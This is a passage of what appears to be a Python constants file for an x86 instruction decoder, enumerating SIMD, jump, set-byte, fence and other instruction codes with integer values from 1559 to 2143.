EVEX_VPUNPCKHDQ_ZMM_K1Z_ZMM_ZMMM512B32: int = 1559
PACKSSDW_MM_MMM64: int = 1560
PACKSSDW_XMM_XMMM128: int = 1561
VEX_VPACKSSDW_XMM_XMM_XMMM128: int = 1562
VEX_VPACKSSDW_YMM_YMM_YMMM256: int = 1563
EVEX_VPACKSSDW_XMM_K1Z_XMM_XMMM128B32: int = 1564
EVEX_VPACKSSDW_YMM_K1Z_YMM_YMMM256B32: int = 1565
EVEX_VPACKSSDW_ZMM_K1Z_ZMM_ZMMM512B32: int = 1566
PUNPCKLQDQ_XMM_XMMM128: int = 1567
VEX_VPUNPCKLQDQ_XMM_XMM_XMMM128: int = 1568
VEX_VPUNPCKLQDQ_YMM_YMM_YMMM256: int = 1569
EVEX_VPUNPCKLQDQ_XMM_K1Z_XMM_XMMM128B64: int = 1570
EVEX_VPUNPCKLQDQ_YMM_K1Z_YMM_YMMM256B64: int = 1571
EVEX_VPUNPCKLQDQ_ZMM_K1Z_ZMM_ZMMM512B64: int = 1572
PUNPCKHQDQ_XMM_XMMM128: int = 1573
VEX_VPUNPCKHQDQ_XMM_XMM_XMMM128: int = 1574
VEX_VPUNPCKHQDQ_YMM_YMM_YMMM256: int = 1575
EVEX_VPUNPCKHQDQ_XMM_K1Z_XMM_XMMM128B64: int = 1576
EVEX_VPUNPCKHQDQ_YMM_K1Z_YMM_YMMM256B64: int = 1577
EVEX_VPUNPCKHQDQ_ZMM_K1Z_ZMM_ZMMM512B64: int = 1578
MOVD_MM_RM32: int = 1579
MOVQ_MM_RM64: int = 1580
MOVD_XMM_RM32: int = 1581
MOVQ_XMM_RM64: int = 1582
VEX_VMOVD_XMM_RM32: int = 1583
VEX_VMOVQ_XMM_RM64: int = 1584
EVEX_VMOVD_XMM_RM32: int = 1585
EVEX_VMOVQ_XMM_RM64: int = 1586
MOVQ_MM_MMM64: int = 1587
MOVDQA_XMM_XMMM128: int = 1588
VEX_VMOVDQA_XMM_XMMM128: int = 1589
VEX_VMOVDQA_YMM_YMMM256: int = 1590
EVEX_VMOVDQA32_XMM_K1Z_XMMM128: int = 1591
EVEX_VMOVDQA32_YMM_K1Z_YMMM256: int = 1592
EVEX_VMOVDQA32_ZMM_K1Z_ZMMM512: int = 1593
EVEX_VMOVDQA64_XMM_K1Z_XMMM128: int = 1594
EVEX_VMOVDQA64_YMM_K1Z_YMMM256: int = 1595
EVEX_VMOVDQA64_ZMM_K1Z_ZMMM512: int = 1596
MOVDQU_XMM_XMMM128: int = 1597
VEX_VMOVDQU_XMM_XMMM128: int = 1598
VEX_VMOVDQU_YMM_YMMM256: int = 1599
EVEX_VMOVDQU32_XMM_K1Z_XMMM128: int = 1600
EVEX_VMOVDQU32_YMM_K1Z_YMMM256: int = 1601
EVEX_VMOVDQU32_ZMM_K1Z_ZMMM512: int = 1602
EVEX_VMOVDQU64_XMM_K1Z_XMMM128: int = 1603
EVEX_VMOVDQU64_YMM_K1Z_YMMM256: int = 1604
EVEX_VMOVDQU64_ZMM_K1Z_ZMMM512: int = 1605
EVEX_VMOVDQU8_XMM_K1Z_XMMM128: int = 1606
EVEX_VMOVDQU8_YMM_K1Z_YMMM256: int = 1607
EVEX_VMOVDQU8_ZMM_K1Z_ZMMM512: int = 1608
EVEX_VMOVDQU16_XMM_K1Z_XMMM128: int = 1609
EVEX_VMOVDQU16_YMM_K1Z_YMMM256: int = 1610
EVEX_VMOVDQU16_ZMM_K1Z_ZMMM512: int = 1611
PSHUFW_MM_MMM64_IMM8: int = 1612
PSHUFD_XMM_XMMM128_IMM8: int = 1613
VEX_VPSHUFD_XMM_XMMM128_IMM8: int = 1614
VEX_VPSHUFD_YMM_YMMM256_IMM8: int = 1615
EVEX_VPSHUFD_XMM_K1Z_XMMM128B32_IMM8: int = 1616
EVEX_VPSHUFD_YMM_K1Z_YMMM256B32_IMM8: int = 1617
EVEX_VPSHUFD_ZMM_K1Z_ZMMM512B32_IMM8: int = 1618
PSHUFHW_XMM_XMMM128_IMM8: int = 1619
VEX_VPSHUFHW_XMM_XMMM128_IMM8: int = 1620
VEX_VPSHUFHW_YMM_YMMM256_IMM8: int = 1621
EVEX_VPSHUFHW_XMM_K1Z_XMMM128_IMM8: int = 1622
EVEX_VPSHUFHW_YMM_K1Z_YMMM256_IMM8: int = 1623
EVEX_VPSHUFHW_ZMM_K1Z_ZMMM512_IMM8: int = 1624
PSHUFLW_XMM_XMMM128_IMM8: int = 1625
VEX_VPSHUFLW_XMM_XMMM128_IMM8: int = 1626
VEX_VPSHUFLW_YMM_YMMM256_IMM8: int = 1627
EVEX_VPSHUFLW_XMM_K1Z_XMMM128_IMM8: int = 1628
EVEX_VPSHUFLW_YMM_K1Z_YMMM256_IMM8: int = 1629
EVEX_VPSHUFLW_ZMM_K1Z_ZMMM512_IMM8: int = 1630
PSRLW_MM_IMM8: int = 1631
PSRLW_XMM_IMM8: int = 1632
VEX_VPSRLW_XMM_XMM_IMM8: int = 1633
VEX_VPSRLW_YMM_YMM_IMM8: int = 1634
EVEX_VPSRLW_XMM_K1Z_XMMM128_IMM8: int = 1635
EVEX_VPSRLW_YMM_K1Z_YMMM256_IMM8: int = 1636
EVEX_VPSRLW_ZMM_K1Z_ZMMM512_IMM8: int = 1637
PSRAW_MM_IMM8: int = 1638
PSRAW_XMM_IMM8: int = 1639
VEX_VPSRAW_XMM_XMM_IMM8: int = 1640
VEX_VPSRAW_YMM_YMM_IMM8: int = 1641
EVEX_VPSRAW_XMM_K1Z_XMMM128_IMM8: int = 1642
EVEX_VPSRAW_YMM_K1Z_YMMM256_IMM8: int = 1643
EVEX_VPSRAW_ZMM_K1Z_ZMMM512_IMM8: int = 1644
PSLLW_MM_IMM8: int = 1645
PSLLW_XMM_IMM8: int = 1646
VEX_VPSLLW_XMM_XMM_IMM8: int = 1647
VEX_VPSLLW_YMM_YMM_IMM8: int = 1648
EVEX_VPSLLW_XMM_K1Z_XMMM128_IMM8: int = 1649
EVEX_VPSLLW_YMM_K1Z_YMMM256_IMM8: int = 1650
EVEX_VPSLLW_ZMM_K1Z_ZMMM512_IMM8: int = 1651
EVEX_VPRORD_XMM_K1Z_XMMM128B32_IMM8: int = 1652
EVEX_VPRORD_YMM_K1Z_YMMM256B32_IMM8: int = 1653
EVEX_VPRORD_ZMM_K1Z_ZMMM512B32_IMM8: int = 1654
EVEX_VPRORQ_XMM_K1Z_XMMM128B64_IMM8: int = 1655
EVEX_VPRORQ_YMM_K1Z_YMMM256B64_IMM8: int = 1656
EVEX_VPRORQ_ZMM_K1Z_ZMMM512B64_IMM8: int = 1657
EVEX_VPROLD_XMM_K1Z_XMMM128B32_IMM8: int = 1658
EVEX_VPROLD_YMM_K1Z_YMMM256B32_IMM8: int = 1659
EVEX_VPROLD_ZMM_K1Z_ZMMM512B32_IMM8: int = 1660
EVEX_VPROLQ_XMM_K1Z_XMMM128B64_IMM8: int = 1661
EVEX_VPROLQ_YMM_K1Z_YMMM256B64_IMM8: int = 1662
EVEX_VPROLQ_ZMM_K1Z_ZMMM512B64_IMM8: int = 1663
PSRLD_MM_IMM8: int = 1664
PSRLD_XMM_IMM8: int = 1665
VEX_VPSRLD_XMM_XMM_IMM8: int = 1666
VEX_VPSRLD_YMM_YMM_IMM8: int = 1667
EVEX_VPSRLD_XMM_K1Z_XMMM128B32_IMM8: int = 1668
EVEX_VPSRLD_YMM_K1Z_YMMM256B32_IMM8: int = 1669
EVEX_VPSRLD_ZMM_K1Z_ZMMM512B32_IMM8: int = 1670
PSRAD_MM_IMM8: int = 1671
PSRAD_XMM_IMM8: int = 1672
VEX_VPSRAD_XMM_XMM_IMM8: int = 1673
VEX_VPSRAD_YMM_YMM_IMM8: int = 1674
EVEX_VPSRAD_XMM_K1Z_XMMM128B32_IMM8: int = 1675
EVEX_VPSRAD_YMM_K1Z_YMMM256B32_IMM8: int = 1676
EVEX_VPSRAD_ZMM_K1Z_ZMMM512B32_IMM8: int = 1677
EVEX_VPSRAQ_XMM_K1Z_XMMM128B64_IMM8: int = 1678
EVEX_VPSRAQ_YMM_K1Z_YMMM256B64_IMM8: int = 1679
EVEX_VPSRAQ_ZMM_K1Z_ZMMM512B64_IMM8: int = 1680
PSLLD_MM_IMM8: int = 1681
PSLLD_XMM_IMM8: int = 1682
VEX_VPSLLD_XMM_XMM_IMM8: int = 1683
VEX_VPSLLD_YMM_YMM_IMM8: int = 1684
EVEX_VPSLLD_XMM_K1Z_XMMM128B32_IMM8: int = 1685
EVEX_VPSLLD_YMM_K1Z_YMMM256B32_IMM8: int = 1686
EVEX_VPSLLD_ZMM_K1Z_ZMMM512B32_IMM8: int = 1687
PSRLQ_MM_IMM8: int = 1688
PSRLQ_XMM_IMM8: int = 1689
VEX_VPSRLQ_XMM_XMM_IMM8: int = 1690
VEX_VPSRLQ_YMM_YMM_IMM8: int = 1691
EVEX_VPSRLQ_XMM_K1Z_XMMM128B64_IMM8: int = 1692
EVEX_VPSRLQ_YMM_K1Z_YMMM256B64_IMM8: int = 1693
EVEX_VPSRLQ_ZMM_K1Z_ZMMM512B64_IMM8: int = 1694
PSRLDQ_XMM_IMM8: int = 1695
VEX_VPSRLDQ_XMM_XMM_IMM8: int = 1696
VEX_VPSRLDQ_YMM_YMM_IMM8: int = 1697
EVEX_VPSRLDQ_XMM_XMMM128_IMM8: int = 1698
EVEX_VPSRLDQ_YMM_YMMM256_IMM8: int = 1699
EVEX_VPSRLDQ_ZMM_ZMMM512_IMM8: int = 1700
PSLLQ_MM_IMM8: int = 1701
PSLLQ_XMM_IMM8: int = 1702
VEX_VPSLLQ_XMM_XMM_IMM8: int = 1703
VEX_VPSLLQ_YMM_YMM_IMM8: int = 1704
EVEX_VPSLLQ_XMM_K1Z_XMMM128B64_IMM8: int = 1705
EVEX_VPSLLQ_YMM_K1Z_YMMM256B64_IMM8: int = 1706
EVEX_VPSLLQ_ZMM_K1Z_ZMMM512B64_IMM8: int = 1707
PSLLDQ_XMM_IMM8: int = 1708
VEX_VPSLLDQ_XMM_XMM_IMM8: int = 1709
VEX_VPSLLDQ_YMM_YMM_IMM8: int = 1710
EVEX_VPSLLDQ_XMM_XMMM128_IMM8: int = 1711
EVEX_VPSLLDQ_YMM_YMMM256_IMM8: int = 1712
EVEX_VPSLLDQ_ZMM_ZMMM512_IMM8: int = 1713
PCMPEQB_MM_MMM64: int = 1714
PCMPEQB_XMM_XMMM128: int = 1715
VEX_VPCMPEQB_XMM_XMM_XMMM128: int = 1716
VEX_VPCMPEQB_YMM_YMM_YMMM256: int = 1717
EVEX_VPCMPEQB_KR_K1_XMM_XMMM128: int = 1718
EVEX_VPCMPEQB_KR_K1_YMM_YMMM256: int = 1719
EVEX_VPCMPEQB_KR_K1_ZMM_ZMMM512: int = 1720
PCMPEQW_MM_MMM64: int = 1721
PCMPEQW_XMM_XMMM128: int = 1722
VEX_VPCMPEQW_XMM_XMM_XMMM128: int = 1723
VEX_VPCMPEQW_YMM_YMM_YMMM256: int = 1724
EVEX_VPCMPEQW_KR_K1_XMM_XMMM128: int = 1725
EVEX_VPCMPEQW_KR_K1_YMM_YMMM256: int = 1726
EVEX_VPCMPEQW_KR_K1_ZMM_ZMMM512: int = 1727
PCMPEQD_MM_MMM64: int = 1728
PCMPEQD_XMM_XMMM128: int = 1729
VEX_VPCMPEQD_XMM_XMM_XMMM128: int = 1730
VEX_VPCMPEQD_YMM_YMM_YMMM256: int = 1731
EVEX_VPCMPEQD_KR_K1_XMM_XMMM128B32: int = 1732
EVEX_VPCMPEQD_KR_K1_YMM_YMMM256B32: int = 1733
EVEX_VPCMPEQD_KR_K1_ZMM_ZMMM512B32: int = 1734
EMMS: int = 1735
VEX_VZEROUPPER: int = 1736
VEX_VZEROALL: int = 1737
VMREAD_RM32_R32: int = 1738
VMREAD_RM64_R64: int = 1739
EVEX_VCVTTPS2UDQ_XMM_K1Z_XMMM128B32: int = 1740
EVEX_VCVTTPS2UDQ_YMM_K1Z_YMMM256B32: int = 1741
EVEX_VCVTTPS2UDQ_ZMM_K1Z_ZMMM512B32_SAE: int = 1742
EVEX_VCVTTPD2UDQ_XMM_K1Z_XMMM128B64: int = 1743
EVEX_VCVTTPD2UDQ_XMM_K1Z_YMMM256B64: int = 1744
EVEX_VCVTTPD2UDQ_YMM_K1Z_ZMMM512B64_SAE: int = 1745
EXTRQ_XMM_IMM8_IMM8: int = 1746
EVEX_VCVTTPS2UQQ_XMM_K1Z_XMMM64B32: int = 1747
EVEX_VCVTTPS2UQQ_YMM_K1Z_XMMM128B32: int = 1748
EVEX_VCVTTPS2UQQ_ZMM_K1Z_YMMM256B32_SAE: int = 1749
EVEX_VCVTTPD2UQQ_XMM_K1Z_XMMM128B64: int = 1750
EVEX_VCVTTPD2UQQ_YMM_K1Z_YMMM256B64: int = 1751
EVEX_VCVTTPD2UQQ_ZMM_K1Z_ZMMM512B64_SAE: int = 1752
EVEX_VCVTTSS2USI_R32_XMMM32_SAE: int = 1753
EVEX_VCVTTSS2USI_R64_XMMM32_SAE: int = 1754
INSERTQ_XMM_XMM_IMM8_IMM8: int = 1755
EVEX_VCVTTSD2USI_R32_XMMM64_SAE: int = 1756
EVEX_VCVTTSD2USI_R64_XMMM64_SAE: int = 1757
VMWRITE_R32_RM32: int = 1758
VMWRITE_R64_RM64: int = 1759
EVEX_VCVTPS2UDQ_XMM_K1Z_XMMM128B32: int = 1760
EVEX_VCVTPS2UDQ_YMM_K1Z_YMMM256B32: int = 1761
EVEX_VCVTPS2UDQ_ZMM_K1Z_ZMMM512B32_ER: int = 1762
EVEX_VCVTPD2UDQ_XMM_K1Z_XMMM128B64: int = 1763
EVEX_VCVTPD2UDQ_XMM_K1Z_YMMM256B64: int = 1764
EVEX_VCVTPD2UDQ_YMM_K1Z_ZMMM512B64_ER: int = 1765
EXTRQ_XMM_XMM: int = 1766
EVEX_VCVTPS2UQQ_XMM_K1Z_XMMM64B32: int = 1767
EVEX_VCVTPS2UQQ_YMM_K1Z_XMMM128B32: int = 1768
EVEX_VCVTPS2UQQ_ZMM_K1Z_YMMM256B32_ER: int = 1769
EVEX_VCVTPD2UQQ_XMM_K1Z_XMMM128B64: int = 1770
EVEX_VCVTPD2UQQ_YMM_K1Z_YMMM256B64: int = 1771
EVEX_VCVTPD2UQQ_ZMM_K1Z_ZMMM512B64_ER: int = 1772
EVEX_VCVTSS2USI_R32_XMMM32_ER: int = 1773
EVEX_VCVTSS2USI_R64_XMMM32_ER: int = 1774
INSERTQ_XMM_XMM: int = 1775
EVEX_VCVTSD2USI_R32_XMMM64_ER: int = 1776
EVEX_VCVTSD2USI_R64_XMMM64_ER: int = 1777
EVEX_VCVTTPS2QQ_XMM_K1Z_XMMM64B32: int = 1778
EVEX_VCVTTPS2QQ_YMM_K1Z_XMMM128B32: int = 1779
EVEX_VCVTTPS2QQ_ZMM_K1Z_YMMM256B32_SAE: int = 1780
EVEX_VCVTTPD2QQ_XMM_K1Z_XMMM128B64: int = 1781
EVEX_VCVTTPD2QQ_YMM_K1Z_YMMM256B64: int = 1782
EVEX_VCVTTPD2QQ_ZMM_K1Z_ZMMM512B64_SAE: int = 1783
EVEX_VCVTUDQ2PD_XMM_K1Z_XMMM64B32: int = 1784
EVEX_VCVTUDQ2PD_YMM_K1Z_XMMM128B32: int = 1785
EVEX_VCVTUDQ2PD_ZMM_K1Z_YMMM256B32_ER: int = 1786
EVEX_VCVTUQQ2PD_XMM_K1Z_XMMM128B64: int = 1787
EVEX_VCVTUQQ2PD_YMM_K1Z_YMMM256B64: int = 1788
EVEX_VCVTUQQ2PD_ZMM_K1Z_ZMMM512B64_ER: int = 1789
EVEX_VCVTUDQ2PS_XMM_K1Z_XMMM128B32: int = 1790
EVEX_VCVTUDQ2PS_YMM_K1Z_YMMM256B32: int = 1791
EVEX_VCVTUDQ2PS_ZMM_K1Z_ZMMM512B32_ER: int = 1792
EVEX_VCVTUQQ2PS_XMM_K1Z_XMMM128B64: int = 1793
EVEX_VCVTUQQ2PS_XMM_K1Z_YMMM256B64: int = 1794
EVEX_VCVTUQQ2PS_YMM_K1Z_ZMMM512B64_ER: int = 1795
EVEX_VCVTPS2QQ_XMM_K1Z_XMMM64B32: int = 1796
EVEX_VCVTPS2QQ_YMM_K1Z_XMMM128B32: int = 1797
EVEX_VCVTPS2QQ_ZMM_K1Z_YMMM256B32_ER: int = 1798
EVEX_VCVTPD2QQ_XMM_K1Z_XMMM128B64: int = 1799
EVEX_VCVTPD2QQ_YMM_K1Z_YMMM256B64: int = 1800
EVEX_VCVTPD2QQ_ZMM_K1Z_ZMMM512B64_ER: int = 1801
EVEX_VCVTUSI2SS_XMM_XMM_RM32_ER: int = 1802
EVEX_VCVTUSI2SS_XMM_XMM_RM64_ER: int = 1803
EVEX_VCVTUSI2SD_XMM_XMM_RM32_ER: int = 1804
EVEX_VCVTUSI2SD_XMM_XMM_RM64_ER: int = 1805
HADDPD_XMM_XMMM128: int = 1806
VEX_VHADDPD_XMM_XMM_XMMM128: int = 1807
VEX_VHADDPD_YMM_YMM_YMMM256: int = 1808
HADDPS_XMM_XMMM128: int = 1809
VEX_VHADDPS_XMM_XMM_XMMM128: int = 1810
VEX_VHADDPS_YMM_YMM_YMMM256: int = 1811
HSUBPD_XMM_XMMM128: int = 1812
VEX_VHSUBPD_XMM_XMM_XMMM128: int = 1813
VEX_VHSUBPD_YMM_YMM_YMMM256: int = 1814
HSUBPS_XMM_XMMM128: int = 1815
VEX_VHSUBPS_XMM_XMM_XMMM128: int = 1816
VEX_VHSUBPS_YMM_YMM_YMMM256: int = 1817
MOVD_RM32_MM: int = 1818
MOVQ_RM64_MM: int = 1819
MOVD_RM32_XMM: int = 1820
MOVQ_RM64_XMM: int = 1821
VEX_VMOVD_RM32_XMM: int = 1822
VEX_VMOVQ_RM64_XMM: int = 1823
EVEX_VMOVD_RM32_XMM: int = 1824
EVEX_VMOVQ_RM64_XMM: int = 1825
MOVQ_XMM_XMMM64: int = 1826
VEX_VMOVQ_XMM_XMMM64: int = 1827
EVEX_VMOVQ_XMM_XMMM64: int = 1828
MOVQ_MMM64_MM: int = 1829
MOVDQA_XMMM128_XMM: int = 1830
VEX_VMOVDQA_XMMM128_XMM: int = 1831
VEX_VMOVDQA_YMMM256_YMM: int = 1832
EVEX_VMOVDQA32_XMMM128_K1Z_XMM: int = 1833
EVEX_VMOVDQA32_YMMM256_K1Z_YMM: int = 1834
EVEX_VMOVDQA32_ZMMM512_K1Z_ZMM: int = 1835
EVEX_VMOVDQA64_XMMM128_K1Z_XMM: int = 1836
EVEX_VMOVDQA64_YMMM256_K1Z_YMM: int = 1837
EVEX_VMOVDQA64_ZMMM512_K1Z_ZMM: int = 1838
MOVDQU_XMMM128_XMM: int = 1839
VEX_VMOVDQU_XMMM128_XMM: int = 1840
VEX_VMOVDQU_YMMM256_YMM: int = 1841
EVEX_VMOVDQU32_XMMM128_K1Z_XMM: int = 1842
EVEX_VMOVDQU32_YMMM256_K1Z_YMM: int = 1843
EVEX_VMOVDQU32_ZMMM512_K1Z_ZMM: int = 1844
EVEX_VMOVDQU64_XMMM128_K1Z_XMM: int = 1845
EVEX_VMOVDQU64_YMMM256_K1Z_YMM: int = 1846
EVEX_VMOVDQU64_ZMMM512_K1Z_ZMM: int = 1847
EVEX_VMOVDQU8_XMMM128_K1Z_XMM: int = 1848
EVEX_VMOVDQU8_YMMM256_K1Z_YMM: int = 1849
EVEX_VMOVDQU8_ZMMM512_K1Z_ZMM: int = 1850
EVEX_VMOVDQU16_XMMM128_K1Z_XMM: int = 1851
EVEX_VMOVDQU16_YMMM256_K1Z_YMM: int = 1852
EVEX_VMOVDQU16_ZMMM512_K1Z_ZMM: int = 1853
JO_REL16: int = 1854
JO_REL32_32: int = 1855
JO_REL32_64: int = 1856
JNO_REL16: int = 1857
JNO_REL32_32: int = 1858
JNO_REL32_64: int = 1859
JB_REL16: int = 1860
JB_REL32_32: int = 1861
JB_REL32_64: int = 1862
JAE_REL16: int = 1863
JAE_REL32_32: int = 1864
JAE_REL32_64: int = 1865
JE_REL16: int = 1866
JE_REL32_32: int = 1867
JE_REL32_64: int = 1868
JNE_REL16: int = 1869
JNE_REL32_32: int = 1870
JNE_REL32_64: int = 1871
JBE_REL16: int = 1872
JBE_REL32_32: int = 1873
JBE_REL32_64: int = 1874
JA_REL16: int = 1875
JA_REL32_32: int = 1876
JA_REL32_64: int = 1877
JS_REL16: int = 1878
JS_REL32_32: int = 1879
JS_REL32_64: int = 1880
JNS_REL16: int = 1881
JNS_REL32_32: int = 1882
JNS_REL32_64: int = 1883
JP_REL16: int = 1884
JP_REL32_32: int = 1885
JP_REL32_64: int = 1886
JNP_REL16: int = 1887
JNP_REL32_32: int = 1888
JNP_REL32_64: int = 1889
JL_REL16: int = 1890
JL_REL32_32: int = 1891
JL_REL32_64: int = 1892
JGE_REL16: int = 1893
JGE_REL32_32: int = 1894
JGE_REL32_64: int = 1895
JLE_REL16: int = 1896
JLE_REL32_32: int = 1897
JLE_REL32_64: int = 1898
JG_REL16: int = 1899
JG_REL32_32: int = 1900
JG_REL32_64: int = 1901
SETO_RM8: int = 1902
SETNO_RM8: int = 1903
SETB_RM8: int = 1904
SETAE_RM8: int = 1905
SETE_RM8: int = 1906
SETNE_RM8: int = 1907
SETBE_RM8: int = 1908
SETA_RM8: int = 1909
SETS_RM8: int = 1910
SETNS_RM8: int = 1911
SETP_RM8: int = 1912
SETNP_RM8: int = 1913
SETL_RM8: int = 1914
SETGE_RM8: int = 1915
SETLE_RM8: int = 1916
SETG_RM8: int = 1917
VEX_KMOVW_KR_KM16: int = 1918
VEX_KMOVQ_KR_KM64: int = 1919
VEX_KMOVB_KR_KM8: int = 1920
VEX_KMOVD_KR_KM32: int = 1921
VEX_KMOVW_M16_KR: int = 1922
VEX_KMOVQ_M64_KR: int = 1923
VEX_KMOVB_M8_KR: int = 1924
VEX_KMOVD_M32_KR: int = 1925
VEX_KMOVW_KR_R32: int = 1926
VEX_KMOVB_KR_R32: int = 1927
VEX_KMOVD_KR_R32: int = 1928
VEX_KMOVQ_KR_R64: int = 1929
VEX_KMOVW_R32_KR: int = 1930
VEX_KMOVB_R32_KR: int = 1931
VEX_KMOVD_R32_KR: int = 1932
VEX_KMOVQ_R64_KR: int = 1933
VEX_KORTESTW_KR_KR: int = 1934
VEX_KORTESTQ_KR_KR: int = 1935
VEX_KORTESTB_KR_KR: int = 1936
VEX_KORTESTD_KR_KR: int = 1937
VEX_KTESTW_KR_KR: int = 1938
VEX_KTESTQ_KR_KR: int = 1939
VEX_KTESTB_KR_KR: int = 1940
VEX_KTESTD_KR_KR: int = 1941
PUSHW_FS: int = 1942
PUSHD_FS: int = 1943
PUSHQ_FS: int = 1944
POPW_FS: int = 1945
POPD_FS: int = 1946
POPQ_FS: int = 1947
CPUID: int = 1948
BT_RM16_R16: int = 1949
BT_RM32_R32: int = 1950
BT_RM64_R64: int = 1951
SHLD_RM16_R16_IMM8: int = 1952
SHLD_RM32_R32_IMM8: int = 1953
SHLD_RM64_R64_IMM8: int = 1954
SHLD_RM16_R16_CL: int = 1955
SHLD_RM32_R32_CL: int = 1956
SHLD_RM64_R64_CL: int = 1957
MONTMUL_16: int = 1958
MONTMUL_32: int = 1959
MONTMUL_64: int = 1960
XSHA1_16: int = 1961
XSHA1_32: int = 1962
XSHA1_64: int = 1963
XSHA256_16: int = 1964
XSHA256_32: int = 1965
XSHA256_64: int = 1966
XBTS_R16_RM16: int = 1967
XBTS_R32_RM32: int = 1968
XSTORE_16: int = 1969
XSTORE_32: int = 1970
XSTORE_64: int = 1971
XCRYPTECB_16: int = 1972
XCRYPTECB_32: int = 1973
XCRYPTECB_64: int = 1974
XCRYPTCBC_16: int = 1975
XCRYPTCBC_32: int = 1976
XCRYPTCBC_64: int = 1977
XCRYPTCTR_16: int = 1978
XCRYPTCTR_32: int = 1979
XCRYPTCTR_64: int = 1980
XCRYPTCFB_16: int = 1981
XCRYPTCFB_32: int = 1982
XCRYPTCFB_64: int = 1983
XCRYPTOFB_16: int = 1984
XCRYPTOFB_32: int = 1985
XCRYPTOFB_64: int = 1986
IBTS_RM16_R16: int = 1987
IBTS_RM32_R32: int = 1988
CMPXCHG486_RM8_R8: int = 1989
CMPXCHG486_RM16_R16: int = 1990
CMPXCHG486_RM32_R32: int = 1991
PUSHW_GS: int = 1992
PUSHD_GS: int = 1993
PUSHQ_GS: int = 1994
POPW_GS: int = 1995
POPD_GS: int = 1996
POPQ_GS: int = 1997
RSM: int = 1998
BTS_RM16_R16: int = 1999
BTS_RM32_R32: int = 2000
BTS_RM64_R64: int = 2001
SHRD_RM16_R16_IMM8: int = 2002
SHRD_RM32_R32_IMM8: int = 2003
SHRD_RM64_R64_IMM8: int = 2004
SHRD_RM16_R16_CL: int = 2005
SHRD_RM32_R32_CL: int = 2006
SHRD_RM64_R64_CL: int = 2007
FXSAVE_M512BYTE: int = 2008
FXSAVE64_M512BYTE: int = 2009
RDFSBASE_R32: int = 2010
RDFSBASE_R64: int = 2011
FXRSTOR_M512BYTE: int = 2012
FXRSTOR64_M512BYTE: int = 2013
RDGSBASE_R32: int = 2014
RDGSBASE_R64: int = 2015
LDMXCSR_M32: int = 2016
WRFSBASE_R32: int = 2017
WRFSBASE_R64: int = 2018
VEX_VLDMXCSR_M32: int = 2019
STMXCSR_M32: int = 2020
WRGSBASE_R32: int = 2021
WRGSBASE_R64: int = 2022
VEX_VSTMXCSR_M32: int = 2023
XSAVE_MEM: int = 2024
XSAVE64_MEM: int = 2025
PTWRITE_RM32: int = 2026
PTWRITE_RM64: int = 2027
XRSTOR_MEM: int = 2028
XRSTOR64_MEM: int = 2029
INCSSPD_R32: int = 2030
INCSSPQ_R64: int = 2031
XSAVEOPT_MEM: int = 2032
XSAVEOPT64_MEM: int = 2033
CLWB_M8: int = 2034
TPAUSE_R32: int = 2035
TPAUSE_R64: int = 2036
CLRSSBSY_M64: int = 2037
UMONITOR_R16: int = 2038
UMONITOR_R32: int = 2039
UMONITOR_R64: int = 2040
UMWAIT_R32: int = 2041
UMWAIT_R64: int = 2042
CLFLUSH_M8: int = 2043
CLFLUSHOPT_M8: int = 2044
LFENCE: int = 2045
LFENCE_E9: int = 2046
LFENCE_EA: int = 2047
LFENCE_EB: int = 2048
LFENCE_EC: int = 2049
LFENCE_ED: int = 2050
LFENCE_EE: int = 2051
LFENCE_EF: int = 2052
MFENCE: int = 2053
MFENCE_F1: int = 2054
MFENCE_F2: int = 2055
MFENCE_F3: int = 2056
MFENCE_F4: int = 2057
MFENCE_F5: int = 2058
MFENCE_F6: int = 2059
MFENCE_F7: int = 2060
SFENCE: int = 2061
SFENCE_F9: int = 2062
SFENCE_FA: int = 2063
SFENCE_FB: int = 2064
SFENCE_FC: int = 2065
SFENCE_FD: int = 2066
SFENCE_FE: int = 2067
SFENCE_FF: int = 2068
PCOMMIT: int = 2069
IMUL_R16_RM16: int = 2070
IMUL_R32_RM32: int = 2071
IMUL_R64_RM64: int = 2072
CMPXCHG_RM8_R8: int = 2073
CMPXCHG_RM16_R16: int = 2074
CMPXCHG_RM32_R32: int = 2075
CMPXCHG_RM64_R64: int = 2076
LSS_R16_M1616: int = 2077
LSS_R32_M1632: int = 2078
LSS_R64_M1664: int = 2079
BTR_RM16_R16: int = 2080
BTR_RM32_R32: int = 2081
BTR_RM64_R64: int = 2082
LFS_R16_M1616: int = 2083
LFS_R32_M1632: int = 2084
LFS_R64_M1664: int = 2085
LGS_R16_M1616: int = 2086
LGS_R32_M1632: int = 2087
LGS_R64_M1664: int = 2088
MOVZX_R16_RM8: int = 2089
MOVZX_R32_RM8: int = 2090
MOVZX_R64_RM8: int = 2091
MOVZX_R16_RM16: int = 2092
MOVZX_R32_RM16: int = 2093
MOVZX_R64_RM16: int = 2094
JMPE_DISP16: int = 2095
JMPE_DISP32: int = 2096
POPCNT_R16_RM16: int = 2097
POPCNT_R32_RM32: int = 2098
POPCNT_R64_RM64: int = 2099
UD1_R16_RM16: int = 2100
UD1_R32_RM32: int = 2101
UD1_R64_RM64: int = 2102
BT_RM16_IMM8: int = 2103
BT_RM32_IMM8: int = 2104
BT_RM64_IMM8: int = 2105
BTS_RM16_IMM8: int = 2106
BTS_RM32_IMM8: int = 2107
BTS_RM64_IMM8: int = 2108
BTR_RM16_IMM8: int = 2109
BTR_RM32_IMM8: int = 2110
BTR_RM64_IMM8: int = 2111
BTC_RM16_IMM8: int = 2112
BTC_RM32_IMM8: int = 2113
BTC_RM64_IMM8: int = 2114
BTC_RM16_R16: int = 2115
BTC_RM32_R32: int = 2116
BTC_RM64_R64: int = 2117
BSF_R16_RM16: int = 2118
BSF_R32_RM32: int = 2119
BSF_R64_RM64: int = 2120
TZCNT_R16_RM16: int = 2121
TZCNT_R32_RM32: int = 2122
TZCNT_R64_RM64: int = 2123
BSR_R16_RM16: int = 2124
BSR_R32_RM32: int = 2125
BSR_R64_RM64: int = 2126
LZCNT_R16_RM16: int = 2127
LZCNT_R32_RM32: int = 2128
LZCNT_R64_RM64: int = 2129
MOVSX_R16_RM8: int = 2130
MOVSX_R32_RM8: int = 2131
MOVSX_R64_RM8: int = 2132
MOVSX_R16_RM16: int = 2133
MOVSX_R32_RM16: int = 2134
MOVSX_R64_RM16: int = 2135
XADD_RM8_R8: int = 2136
XADD_RM16_R16: int = 2137
XADD_RM32_R32: int = 2138
XADD_RM64_R64: int = 2139
CMPPS_XMM_XMMM128_IMM8: int = 2140
VEX_VCMPPS_XMM_XMM_XMMM128_IMM8: int = 2141
VEX_VCMPPS_YMM_YMM_YMMM256_IMM8: int = 2142
EVEX_VCMPPS_KR_K1_XMM_XMMM128B32_IMM8: int = 2143
